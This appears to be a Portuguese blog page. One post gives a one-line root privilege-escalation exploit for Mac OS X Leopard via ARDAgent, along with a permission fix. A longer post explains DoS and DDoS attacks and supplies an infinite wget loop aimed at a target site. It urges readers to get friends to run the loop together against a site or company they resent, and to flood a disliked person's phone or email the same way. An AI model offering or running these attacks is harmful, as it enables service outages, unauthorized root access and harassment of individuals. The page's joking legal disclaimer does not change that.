Somos todos Hackers



TC, “somos hackers” from pedrobayeux on Vimeo.

Mestre TC, pra quem não conhece a figura ele só é um dos guerreiros fundadores da Casa de cultura Tainã . Hacker de verdade mas não de computadores, mas de processos e vícios administrativos e burocráticos do governo. Tem nerd idiota que não vai entender o vídeo pela falta de contexto .. mas isso não importa, os HDs dos nerds vão pifar, e os rastros de sua existência vão repousar nos backups em fita da nuvem. Mas o legado do TC vai ecoar por gerações, pois ele desenvolve pessoas, não códigos.

Salve TC !

Ownando um MAC OS X Leopard com um comando

Dizem que o OSX é mais seguro que a concorrência, acho que não 🙂 Abra um terminal e digite :

osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

Isso mesmo, troque o whoami por qualquer outro comando e execute como root .

Agora vamos resolver o problema e eliminar a ameaça :

sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

Mas não vale Reparar as permissões , ou ele volta com a falha de segurança !!!

Como tirar um site do ar ? Como fechar um estabelecimento ?



Atualmente o jeito mais eficaz de se derrubar um site ou um servidor é por ataques
DDOoS (Distributed Denial of Service ). A idéia é muito simples e funciona quase todas as vezes, mas nenhum h4ck3r vai te contar como fazer, afinal se vc não sabe talvez seja pq não mereça saber ehehh
Um ataque DoS (Negação de serviço) põe a prova os limites físicos de um servidor, tipo , quantas requisições por segundo um servidor aguenta ? E sua banda aguenta quantas conexões simultâneas ? O hd do server consegue dar conta ? E o processador ? Tudo tem um limite, todo server tem um limite de conexões que ele pode fazer, esse limite pode ser imposto pelo software (configuração ou software mal feito), hardware ( quantidade de RAM, vel do CPU, vel da Rede…)… Já reparou que durante o dia em alguns horários fica quase impossível acessar certos sites ? Esse é a idéia fundamental do ataque DoS.
Vamos supor, um jovem entediado pega birra com um determinado site pq eles falaram mal do seu sistema operacional favorito, difundindo calúnias, uma matéria paga pelo concorrente, um verdadeiro FUD. Se ele quiser tirar o site do ar , ele pode usar seus superpoderes hackers, engenharia social e o escambal… Uma outra forma
é fazer inúmeros dowloads sucessivos do site, assim outro visitante terá dificuldades em acessar o conteúdo, ou ainda ele pode estourar o limite de tráfego do site em questão, assim interditando o site até o mês seguinte, gerando prejuizos ao dono do site. Isso é o que chamamos de ataque DoS
Porém, atualmente isso é bem difícil afinal um único server pode servir 1000 usuários ao mesmo tempo, ai um outro jovem entediado resolveu criar um virus que ao invéz de apagar ou roubar dados ele faz downloads sucessivos de um determinado site… Vamos supor que o garoto infecte 500 máquinas, já imaginou, 500 máquinas diferentes atacando um único servidor ? Fazendo downloads , um atrás do outro ou pior, cada uma dessas máquinas fazendo 50 conexões simultâneas cada uma ao mesmo site, 50 * 500 , da quanto isso ? Isso é o que chamamos de ataque DDoS.

Acho que o maior ataque DDoS que já ouvi falar foram usados 200000 máquinas, um outro ataque frustrado chegou a reunir quase 1000000 (um milhão) de máquinas, mas o site atacado foi alertado e mudou de domínio por alguns dias.

Esse tipo de ataque controlado a distância depende da falta de segurança da máquina que vai receber o virus/trojam/worm, por isso é raro ver uma máquina zombie linux/mac/bsd, e com as paranoias no vista acho que esse tipo de ataque vai ser reduzido…
Mas imagine a seguinte situação, um email anuncia que uma grande cantora pop foi flagrada com um outro ídolo em cenas quentes em uma praia,o povo atiçado pela curiosidade vai acessar o link enviado no email, e se o número de pessoas curiosas for muito grande, o site vai cair, independente do boato ser verdadeiro ou não. Quando um site sai do ar devido a uma notícia/boato dizemos que o site foi “slashdoted”, em referencia ao site slashdot.net.

Algumas vezes um site que contém conteúdos que causam indignação e repúdio, saem fora do ar por força dos próprios visitantes, e não por ação de hacktivistas…

Você já sabe o que derruba um site, agora vou te mostrar como :


No terminal linux/mac/bsd

while true;
do wget www.alvo.com.br;
done

Esse comando vai fazer infinitos downloads do site alvo, deixando o mesmo lento ou ainda tirando ele do ar, claro, isso se vc usar uns 500 computadores diferentes 🙂

Mas suponha que vc tenha amigos, que por sua vez tem amigos, se vc conseguir convencer seus amigos a rodarem esse script no mesmo horário apontando para o mesmo site existe uma chance…. Agora imagina um grupo de pessoas revoltadas com alguma empresa, site que querem fazer justiça com os próprios mouses, esse é uma tática…

Vamos além ? Qual é a melhor forma de obrigar alguém a fechar um prédio, comércio ou igreja ? Junte uns 10000 amigos e combinem todos vcs um encontro em algum lugar que não seja um estádio de futebol 🙂 Os camelos de São Paulo fecharam a prefeitura usando essa tática…
Não gosta de um sacana ? Tem o telefone dele ? Ou email ? MSN ? A mesma idéia funciona para quase tudo que envolva centralização em alguma ponta.

Só lembrando, organizar ataques DDoS ou invasões a redes de lanchonete pode ser crime em alguns países… e eu nunca ouvi falar de vc…..